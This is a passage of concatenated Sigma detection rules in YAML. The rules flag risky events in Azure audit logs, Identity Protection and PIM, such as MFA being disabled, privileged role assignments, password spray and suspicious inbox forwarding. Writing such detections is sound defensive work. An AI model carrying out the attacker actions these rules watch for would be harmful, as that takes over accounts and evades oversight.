- Federation Settings modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/azure/audit_logs/azure_group_user_addition_ca_modification.yml
================================================
title: User Added To Group With CA Policy Modification Access
id: 91c95675-1f27-46d0-bead-d1ae96b97cd3
status: test
description: Monitor and alert on group membership additions of groups that have CA policy modification access
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access
author: Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'
date: 2022-08-04
tags:
- attack.privilege-escalation
- attack.credential-access
- attack.defense-evasion
- attack.persistence
- attack.t1548
- attack.t1556
logsource:
product: azure
service: auditlogs
detection:
selection:
properties.message: Add member from group
condition: selection
falsepositives:
- User removed from the group is approved
level: medium
================================================
FILE: rules/cloud/azure/audit_logs/azure_group_user_removal_ca_modification.yml
================================================
title: User Removed From Group With CA Policy Modification Access
id: 665e2d43-70dc-4ccc-9d27-026c9dd7ed9c
status: test
description: Monitor and alert on group membership removal of groups that have CA policy modification access
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access
author: Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'
date: 2022-08-04
tags:
- attack.privilege-escalation
- attack.credential-access
- attack.defense-evasion
- attack.persistence
- attack.t1548
- attack.t1556
logsource:
product: azure
service: auditlogs
detection:
selection:
properties.message: Remove member from group
condition: selection
falsepositives:
- User removed from the group is approved
level: medium
================================================
FILE: rules/cloud/azure/audit_logs/azure_guest_invite_failure.yml
================================================
title: Guest User Invited By Non Approved Inviters
id: 0b4b72e3-4c53-4d5b-b198-2c58cfef39a9
status: test
description: Detects when a user that doesn't have permissions to invite a guest user attempts to invite one.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#things-to-monitor
author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'
date: 2022-08-10
tags:
- attack.privilege-escalation
- attack.initial-access
- attack.persistence
- attack.defense-evasion
- attack.t1078.004
logsource:
product: azure
service: auditlogs
detection:
selection:
properties.message: Invite external user
Status: failure
condition: selection
falsepositives:
- A non malicious user is unaware of the proper process
level: medium
================================================
FILE: rules/cloud/azure/audit_logs/azure_guest_to_member.yml
================================================
title: User State Changed From Guest To Member
id: 8dee7a0d-43fd-4b3c-8cd1-605e189d195e
status: test
description: Detects the change of user type from "Guest" to "Member" for potential elevation of privilege.
references:
- https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts#monitoring-external-user-sign-ins
author: MikeDuddington, '@dudders1'
date: 2022-06-30
tags:
- attack.persistence
- attack.defense-evasion
- attack.privilege-escalation
- attack.initial-access
- attack.t1078.004
logsource:
product: azure
service: auditlogs
detection:
selection:
Category: 'UserManagement'
OperationName: 'Update user'
properties.message: '"displayName":"UserType","oldValue":"[\"Guest\"]","newValue":"[\"Member\"]"'
condition: selection
falsepositives:
- If this was approved by System Administrator.
level: medium
================================================
FILE: rules/cloud/azure/audit_logs/azure_pim_activation_approve_deny.yml
================================================
title: PIM Approvals And Deny Elevation
id: 039a7469-0296-4450-84c0-f6966b16dc6d
status: test
description: Detects when a PIM elevation is approved or denied. Outside of normal operations should be investigated.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment
author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'
date: 2022-08-09
tags:
- attack.persistence
- attack.initial-access
- attack.defense-evasion
- attack.privilege-escalation
- attack.t1078.004
logsource:
product: azure
service: auditlogs
detection:
selection:
properties.message: Request Approved/Denied
condition: selection
falsepositives:
- Actual admin using PIM.
level: high
================================================
FILE: rules/cloud/azure/audit_logs/azure_pim_alerts_disabled.yml
================================================
title: PIM Alert Setting Changes To Disabled
id: aeaef14c-e5bf-4690-a9c8-835caad458bd
status: test
description: Detects when PIM alerts are set to disabled.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment
author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'
date: 2022-08-09
tags:
- attack.initial-access
- attack.defense-evasion
- attack.persistence
- attack.privilege-escalation
- attack.t1078
logsource:
product: azure
service: auditlogs
detection:
selection:
properties.message: Disable PIM Alert
condition: selection
falsepositives:
- Administrator disabling PIM alerts as an active choice.
level: high
================================================
FILE: rules/cloud/azure/audit_logs/azure_pim_change_settings.yml
================================================
title: Changes To PIM Settings
id: db6c06c4-bf3b-421c-aa88-15672b88c743
status: test
description: Detects when changes are made to PIM roles
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment
author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'
date: 2022-08-09
tags:
- attack.initial-access
- attack.defense-evasion
- attack.privilege-escalation
- attack.persistence
- attack.t1078.004
logsource:
product: azure
service: auditlogs
detection:
selection:
properties.message: Update role setting in PIM
condition: selection
falsepositives:
- Legit administrative PIM setting configuration changes
level: high
================================================
FILE: rules/cloud/azure/audit_logs/azure_priviledged_role_assignment_add.yml
================================================
title: User Added To Privilege Role
id: 49a268a4-72f4-4e38-8a7b-885be690c5b5
status: test
description: Detects when a user is added to a privileged role.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment
author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'
date: 2022-08-06
tags:
- attack.persistence
- attack.initial-access
- attack.privilege-escalation
- attack.defense-evasion
- attack.t1078.004
logsource:
product: azure
service: auditlogs
detection:
selection:
properties.message:
- Add eligible member (permanent)
- Add eligible member (eligible)
condition: selection
falsepositives:
- Legtimate administrator actions of adding members from a role
level: high
================================================
FILE: rules/cloud/azure/audit_logs/azure_priviledged_role_assignment_bulk_change.yml
================================================
title: Bulk Deletion Changes To Privileged Account Permissions
id: 102e11e3-2db5-4c9e-bc26-357d42585d21
status: test
description: Detects when a user is removed from a privileged role. Bulk changes should be investigated.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment
author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'
date: 2022-08-05
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1098
logsource:
product: azure
service: auditlogs
detection:
selection:
properties.message:
- Remove eligible member (permanent)
- Remove eligible member (eligible)
condition: selection
falsepositives:
- Legtimate administrator actions of removing members from a role
level: high
================================================
FILE: rules/cloud/azure/audit_logs/azure_privileged_account_creation.yml
================================================
title: Privileged Account Creation
id: f7b5b004-dece-46e4-a4a5-f6fd0e1c6947
status: test
description: Detects when a new admin is created.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#changes-to-privileged-accounts
author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H', Tim Shelton
date: 2022-08-11
modified: 2022-08-16
tags:
- attack.initial-access
- attack.defense-evasion
- attack.persistence
- attack.privilege-escalation
- attack.t1078.004
logsource:
product: azure
service: auditlogs
detection:
selection:
properties.message|contains|all:
- Add user
- Add member to role
Status: Success
condition: selection
falsepositives:
- A legitimate new admin account being created
level: medium
================================================
FILE: rules/cloud/azure/audit_logs/azure_subscription_permissions_elevation_via_auditlogs.yml
================================================
title: Azure Subscription Permission Elevation Via AuditLogs
id: ca9bf243-465e-494a-9e54-bf9fc239057d
status: test
description: |
Detects when a user has been elevated to manage all Azure Subscriptions.
This change should be investigated immediately if it isn't planned.
This setting could allow an attacker access to Azure subscriptions in your environment.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#assignment-and-elevation
author: Austin Songer @austinsonger
date: 2021-11-26
modified: 2022-12-25
tags:
- attack.privilege-escalation
- attack.persistence
- attack.defense-evasion
- attack.initial-access
- attack.t1078
logsource:
product: azure
service: auditlogs
detection:
selection:
Category: 'Administrative'
OperationName: 'Assigns the caller to user access admin'
condition: selection
falsepositives:
- If this was approved by System Administrator.
level: high
================================================
FILE: rules/cloud/azure/audit_logs/azure_tap_added.yml
================================================
title: Temporary Access Pass Added To An Account
id: fa84aaf5-8142-43cd-9ec2-78cfebf878ce
status: test
description: Detects when a temporary access pass (TAP) is added to an account. TAPs added to priv accounts should be investigated
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#changes-to-privileged-accounts
author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'
date: 2022-08-10
tags:
- attack.privilege-escalation
- attack.initial-access
- attack.defense-evasion
- attack.persistence
- attack.t1078.004
logsource:
product: azure
service: auditlogs
detection:
selection:
properties.message: Admin registered security info
Status: Admin registered temporary access pass method for user
condition: selection
falsepositives:
- Administrator adding a legitimate temporary access pass
level: high
================================================
FILE: rules/cloud/azure/audit_logs/azure_update_risk_and_mfa_registration_policy.yml
================================================
title: User Risk and MFA Registration Policy Updated
id: d4c7758e-9417-4f2e-9109-6125d66dabef
status: test
description: |
Detects changes and updates to the user risk and MFA registration policy.
Attackers can modified the policies to Bypass MFA, weaken security thresholds, facilitate further attacks, maintain persistence.
references:
- https://learn.microsoft.com/en-us/entra/id-protection/howto-identity-protection-configure-mfa-policy
- https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities
author: Harjot Singh (@cyb3rjy0t)
date: 2024-08-13
tags:
- attack.persistence
logsource:
product: azure
service: auditlogs
detection:
selection:
LoggedByService: 'AAD Management UX'
Category: 'Policy'
OperationName: 'Update User Risk and MFA Registration Policy'
condition: selection
falsepositives:
- Known updates by administrators.
level: high
================================================
FILE: rules/cloud/azure/audit_logs/azure_user_account_mfa_disable.yml
================================================
title: Multi Factor Authentication Disabled For User Account
id: b18454c8-0be3-41f7-86bc-9c614611b839
status: test
description: |
Detects changes to the "StrongAuthenticationRequirement" value, where the state is set to "0" or "Disabled".
Threat actors were seen disabling multi factor authentication for users in order to maintain or achieve access to the account. Also see in SIM Swap attacks.
references:
- https://www.sans.org/blog/defending-against-scattered-spider-and-the-com-with-cybercrime-intelligence/
author: Harjot Singh (@cyb3rjy0t)
date: 2024-08-21
tags:
- attack.credential-access
- attack.persistence
logsource:
product: azure
service: auditlogs
definition: 'Requirements: The TargetResources array needs to be mapped accurately in order for this rule to work'
detection:
selection:
LoggedByService: 'Core Directory'
Category: 'UserManagement'
OperationName: 'Update user'
TargetResources.ModifiedProperties.DisplayName: 'StrongAuthenticationRequirement'
TargetResources.ModifiedProperties.NewValue|contains: "State\":0"
condition: selection
falsepositives:
- Legitimate authorized activity.
level: medium
================================================
FILE: rules/cloud/azure/audit_logs/azure_user_password_change.yml
================================================
title: Password Reset By User Account
id: 340ee172-4b67-4fb4-832f-f961bdc1f3aa
status: test
description: Detect when a user has reset their password in Azure AD
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts
author: YochanaHenderson, '@Yochana-H'
date: 2022-08-03
tags:
- attack.privilege-escalation
- attack.initial-access
- attack.defense-evasion
- attack.persistence
- attack.credential-access
- attack.t1078.004
logsource:
product: azure
service: auditlogs
detection:
selection:
Category: 'UserManagement'
Status: 'Success'
Initiatedby: 'UPN'
filter:
Target|contains: 'UPN'
ActivityType|contains: 'Password reset'
condition: selection and filter
falsepositives:
- If this was approved by System Administrator or confirmed user action.
level: medium
================================================
FILE: rules/cloud/azure/identity_protection/azure_identity_protection_anomalous_token.yml
================================================
title: Anomalous Token
id: 6555754e-5e7f-4a67-ad1c-4041c413a007
status: test
description: Indicates that there are abnormal characteristics in the token such as an unusual token lifetime or a token that is played from an unfamiliar location.
references:
- https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anomalous-token
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
author: Mark Morowczynski '@markmorow'
date: 2023-08-07
tags:
- attack.t1528
- attack.credential-access
logsource:
product: azure
service: riskdetection
detection:
selection:
riskEventType: 'anomalousToken'
condition: selection
falsepositives:
- We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.
level: high
================================================
FILE: rules/cloud/azure/identity_protection/azure_identity_protection_anomalous_user.yml
================================================
title: Anomalous User Activity
id: 258b6593-215d-4a26-a141-c8e31c1299a6
status: test
description: Indicates that there are anomalous patterns of behavior like suspicious changes to the directory.
references:
- https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anomalous-user-activity
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-03
tags:
- attack.privilege-escalation
- attack.t1098
- attack.persistence
logsource:
product: azure
service: riskdetection
detection:
selection:
riskEventType: 'anomalousUserActivity'
condition: selection
falsepositives:
- We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.
level: high
================================================
FILE: rules/cloud/azure/identity_protection/azure_identity_protection_anonymous_ip_activity.yml
================================================
title: Activity From Anonymous IP Address
id: be4d9c86-d702-4030-b52e-c7859110e5e8
status: test
description: Identifies that users were active from an IP address that has been identified as an anonymous proxy IP address.
references:
- https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#activity-from-anonymous-ip-address
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-03
tags:
- attack.t1078
- attack.persistence
- attack.defense-evasion
- attack.privilege-escalation
- attack.initial-access
logsource:
product: azure
service: riskdetection
detection:
selection:
riskEventType: 'riskyIPAddress'
condition: selection
falsepositives:
- We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.
level: high
================================================
FILE: rules/cloud/azure/identity_protection/azure_identity_protection_anonymous_ip_address.yml
================================================
title: Anonymous IP Address
id: 53acd925-2003-440d-a1f3-71a5253fe237
status: test
description: Indicates sign-ins from an anonymous IP address, for example, using an anonymous browser or VPN.
references:
- https://learn.microsoft.com/en-us/graph/api/resources/riskdetection?view=graph-rest-1.0
- https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anonymous-ip-address
author: Gloria Lee, '@gleeiamglo'
date: 2023-08-22
tags:
- attack.t1528
- attack.credential-access
logsource:
product: azure
service: riskdetection
detection:
selection:
riskEventType: 'anonymizedIPAddress'
condition: selection
falsepositives:
- We recommend investigating the sessions flagged by this detection in the context of other sign-ins
level: high
================================================
FILE: rules/cloud/azure/identity_protection/azure_identity_protection_atypical_travel.yml
================================================
title: Atypical Travel
id: 1a41023f-1e70-4026-921a-4d9341a9038e
status: test
description: Identifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior.
references:
- https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#atypical-travel
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-03
tags:
- attack.t1078
- attack.persistence
- attack.defense-evasion
- attack.privilege-escalation
- attack.initial-access
logsource:
product: azure
service: riskdetection
detection:
selection:
riskEventType: 'unlikelyTravel'
condition: selection
falsepositives:
- We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.
level: high
================================================
FILE: rules/cloud/azure/identity_protection/azure_identity_protection_impossible_travel.yml
================================================
title: Impossible Travel
id: b2572bf9-e20a-4594-b528-40bde666525a
status: test
description: Identifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second.
references:
- https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#impossible-travel
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-03
tags:
- attack.t1078
- attack.persistence
- attack.defense-evasion
- attack.privilege-escalation
- attack.initial-access
logsource:
product: azure
service: riskdetection
detection:
selection:
riskEventType: 'impossibleTravel'
condition: selection
falsepositives:
- Connecting to a VPN, performing activity and then dropping and performing additional activity.
level: high
================================================
FILE: rules/cloud/azure/identity_protection/azure_identity_protection_inbox_forwarding_rule.yml
================================================
title: Suspicious Inbox Forwarding Identity Protection
id: 27e4f1d6-ae72-4ea0-8a67-77a73a289c3d
status: test
description: Indicates suspicious rules such as an inbox rule that forwards a copy of all emails to an external address
references:
- https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-inbox-forwarding
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-03
tags:
- attack.t1114.003
- attack.collection
logsource:
product: azure
service: riskdetection
detection:
selection:
riskEventType: 'suspiciousInboxForwarding'
condition: selection
falsepositives:
- A legitimate forwarding rule.
level: high
================================================
FILE: rules/cloud/azure/identity_protection/azure_identity_protection_inbox_manipulation.yml
================================================
title: Suspicious Inbox Manipulation Rules
id: ceb55fd0-726e-4656-bf4e-b585b7f7d572
status: test
description: Detects suspicious rules that delete or move messages or folders are set on a user's inbox.
references:
- https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-inbox-manipulation-rules
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-03
tags:
- attack.t1140
- attack.defense-evasion
logsource:
product: azure
service: riskdetection
detection:
selection:
riskEventType: 'mcasSuspiciousInboxManipulationRules'
condition: selection
falsepositives:
- Actual mailbox rules that are moving items based on their workflow.
level: high
================================================
FILE: rules/cloud/azure/identity_protection/azure_identity_protection_leaked_credentials.yml
================================================
title: Azure AD Account Credential Leaked
id: 19128e5e-4743-48dc-bd97-52e5775af817
status: test
description: Indicates that the user's valid credentials have been leaked.
references:
- https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#leaked-credentials
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-03
tags:
- attack.t1589
- attack.reconnaissance
logsource:
product: azure
service: riskdetection
detection:
selection:
riskEventType: 'leakedCredentials'
condition: selection
falsepositives:
- A rare hash collision.
level: high
================================================
FILE: rules/cloud/azure/identity_protection/azure_identity_protection_malicious_ip_address.yml
================================================
title: Malicious IP Address Sign-In Failure Rate
id: a3f55ebd-0c01-4ed6-adc0-8fb76d8cd3cd
status: test
description: Indicates sign-in from a malicious IP address based on high failure rates.
references:
- https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malicious-ip-address
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-07
tags:
- attack.t1090
- attack.command-and-control
logsource:
product: azure
service: riskdetection
detection:
selection:
riskEventType: 'maliciousIPAddress'
condition: selection
falsepositives:
- We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.
level: high
================================================
FILE: rules/cloud/azure/identity_protection/azure_identity_protection_malicious_ip_address_suspicious.yml
================================================
title: Malicious IP Address Sign-In Suspicious
id: 36440e1c-5c22-467a-889b-593e66498472
status: test
description: Indicates sign-in from a malicious IP address known to be malicious at time of sign-in.
references:
- https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malicious-ip-address
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-07
tags:
- attack.t1090
- attack.command-and-control
logsource:
product: azure
service: riskdetection
detection:
selection:
riskEventType: 'suspiciousIPAddress'
condition: selection
falsepositives:
- We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.
level: high
================================================
FILE: rules/cloud/azure/identity_protection/azure_identity_protection_malware_linked_ip.yml
================================================
title: Sign-In From Malware Infected IP
id: 821b4dc3-1295-41e7-b157-39ab212dd6bd
status: test
description: Indicates sign-ins from IP addresses infected with malware that is known to actively communicate with a bot server.
references:
- https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malware-linked-ip-address-deprecated
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-03
tags:
- attack.t1090
- attack.command-and-control
logsource:
product: azure
service: riskdetection
detection:
selection:
riskEventType: 'malwareInfectedIPAddress'
condition: selection
falsepositives:
- Using an IP address that is shared by many users
level: high
================================================
FILE: rules/cloud/azure/identity_protection/azure_identity_protection_new_coutry_region.yml
================================================
title: New Country
id: adf9f4d2-559e-4f5c-95be-c28dff0b1476
status: test
description: Detects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations.
references:
- https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#new-country
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-03
tags:
- attack.t1078
- attack.persistence
- attack.defense-evasion
- attack.privilege-escalation
- attack.initial-access
logsource:
product: azure
service: riskdetection
detection:
selection:
riskEventType: 'newCountry'
condition: selection
falsepositives:
- We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.
level: high
================================================
FILE: rules/cloud/azure/identity_protection/azure_identity_protection_password_spray.yml
================================================
title: Password Spray Activity
id: 28ecba0a-c743-4690-ad29-9a8f6f25a6f9
status: test
description: Indicates that a password spray attack has been successfully performed.
references:
- https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#password-spray
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-03
tags:
- attack.t1110
- attack.credential-access
logsource:
product: azure
service: riskdetection
detection:
selection:
riskEventType: 'passwordSpray'
condition: selection
falsepositives:
- We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.
level: high
================================================
FILE: rules/cloud/azure/identity_protection/azure_identity_protection_prt_access.yml
================================================
title: Primary Refresh Token Access Attempt
id: a84fc3b1-c9ce-4125-8e74-bdcdb24021f1
status: test
description: Indicates access attempt to the PRT resource which can be used to move laterally into an organization or perform credential theft
references:
- https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#possible-attempt-to-access-primary-refresh-token-prt
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-07
tags:
- attack.t1528
- attack.credential-access
logsource:
product: azure
service: riskdetection
detection:
selection:
riskEventType: 'attemptedPrtAccess'
condition: selection
falsepositives:
- This detection is low-volume and is seen infrequently in most organizations. When this detection appears it's high risk, and users should be remediated.
level: high
================================================
FILE: rules/cloud/azure/identity_protection/azure_identity_protection_suspicious_browser.yml
================================================
title: Suspicious Browser Activity
id: 944f6adb-7a99-4c69-80c1-b712579e93e6
status: test
description: Indicates anomalous behavior based on suspicious sign-in activity across multiple tenants from different countries in the same browser
references:
- https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-browser
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-03
tags:
- attack.t1078
- attack.persistence
- attack.defense-evasion
- attack.privilege-escalation
- attack.initial-access
logsource:
product: azure
service: riskdetection
detection:
selection:
riskEventType: 'suspiciousBrowser'
condition: selection
falsepositives:
- We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.
level: high
================================================
FILE: rules/cloud/azure/identity_protection/azure_identity_protection_threat_intel.yml
================================================
title: Azure AD Threat Intelligence
id: a2cb56ff-4f46-437a-a0fa-ffa4d1303cba
status: test
description: Indicates user activity that is unusual for the user or consistent with known attack patterns.
references:
- https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-sign-in
- https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-user
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-07
tags:
- attack.t1078
- attack.persistence
- attack.defense-evasion
- attack.privilege-escalation
- attack.initial-access
logsource:
product: azure
service: riskdetection
detection:
selection:
riskEventType: 'investigationsThreatIntelligence'
condition: selection
falsepositives:
- We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.
level: high
================================================
FILE: rules/cloud/azure/identity_protection/azure_identity_protection_token_issuer_anomaly.yml
================================================
title: SAML Token Issuer Anomaly
id: e3393cba-31f0-4207-831e-aef90ab17a8c
status: test
description: Indicates the SAML token issuer for the associated SAML token is potentially compromised. The claims included in the token are unusual or match known attacker patterns
references:
- https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#token-issuer-anomaly
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-03
tags:
- attack.t1606
- attack.credential-access
logsource:
product: azure
service: riskdetection
detection:
selection:
riskEventType: 'tokenIssuerAnomaly'
condition: selection
falsepositives:
- We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.
level: high
================================================
FILE: rules/cloud/azure/identity_protection/azure_identity_protection_unfamilar_sign_in.yml
================================================
title: Unfamiliar Sign-In Properties
id: 128faeef-79dd-44ca-b43c-a9e236a60f49
status: test
description: Detects sign-in with properties that are unfamiliar to the user. The detection considers past sign-in history to look for anomalous sign-ins.
references:
- https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#unfamiliar-sign-in-properties
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-03
tags:
- attack.t1078
- attack.persistence
- attack.defense-evasion
- attack.privilege-escalation
- attack.initial-access
logsource:
product: azure
service: riskdetection
detection:
selection:
riskEventType: 'unfamiliarFeatures'
condition: selection
falsepositives:
- User changing to a new device, location, browser, etc.
level: high
================================================
FILE: rules/cloud/azure/privileged_identity_management/azure_pim_account_stale.yml
================================================
title: Stale Accounts In A Privileged Role
id: e402c26a-267a-45bd-9615-bd9ceda6da85
status: test
description: Identifies when an account hasn't signed in during the past n number of days.
references:
- https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#potential-stale-accounts-in-a-privileged-role
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-14
tags:
- attack.initial-access
- attack.defense-evasion
- attack.t1078
- attack.persistence
- attack.privilege-escalation
logsource:
product: azure
service: pim
detection:
selection:
riskEventType: 'staleSignInAlertIncident'
condition: selection
falsepositives:
- Investigate if potential generic account that cannot be removed.
level: high
================================================
FILE: rules/cloud/azure/privileged_identity_management/azure_pim_invalid_license.yml
================================================
title: Invalid PIM License
id: 58af08eb-f9e1-43c8-9805-3ad9b0482bd8
status: test
description: Identifies when an organization doesn't have the proper license for PIM and is out of compliance.
references:
- https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#the-organization-doesnt-have-microsoft-entra-premium-p2-or-microsoft-entra-id-governance
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-14
tags:
- attack.initial-access
- attack.defense-evasion
- attack.t1078
- attack.persistence
- attack.privilege-escalation
logsource:
product: azure
service: pim
detection:
selection:
riskEventType: 'invalidLicenseAlertIncident'
condition: selection
falsepositives:
- Investigate if licenses have expired.
level: high
================================================
FILE: rules/cloud/azure/privileged_identity_management/azure_pim_role_assigned_outside_of_pim.yml
================================================
title: Roles Assigned Outside PIM
id: b1bc08d1-8224-4758-a0e6-fbcfc98c73bb
status: test
description: Identifies when a privilege role assignment has taken place outside of PIM and may indicate an attack.
references:
- https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-assigned-outside-of-privileged-identity-management
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-14
tags:
- attack.initial-access
- attack.defense-evasion
- attack.t1078
- attack.persistence
- attack.privilege-escalation
logsource:
product: azure
service: pim
detection:
selection:
riskEventType: 'rolesAssignedOutsidePrivilegedIdentityManagementAlertConfiguration'
condition: selection
falsepositives:
- Investigate where users are being assigned privileged roles outside of Privileged Identity Management and prohibit future assignments from there.
level: high
================================================
FILE: rules/cloud/azure/privileged_identity_management/azure_pim_role_frequent_activation.yml
================================================
title: Roles Activated Too Frequently
id: 645fd80d-6c07-435b-9e06-7bc1b5656cba
status: test
description: Identifies when the same privilege role has multiple activations by the same user.
references:
- https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-activated-too-frequently
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-14
tags:
- attack.initial-access
- attack.defense-evasion
- attack.t1078
- attack.persistence
- attack.privilege-escalation
logsource:
product: azure
service: pim
detection:
selection:
riskEventType: 'sequentialActivationRenewalsAlertIncident'
condition: selection
falsepositives:
- Investigate where if active time period for a role is set too short.
level: high
================================================
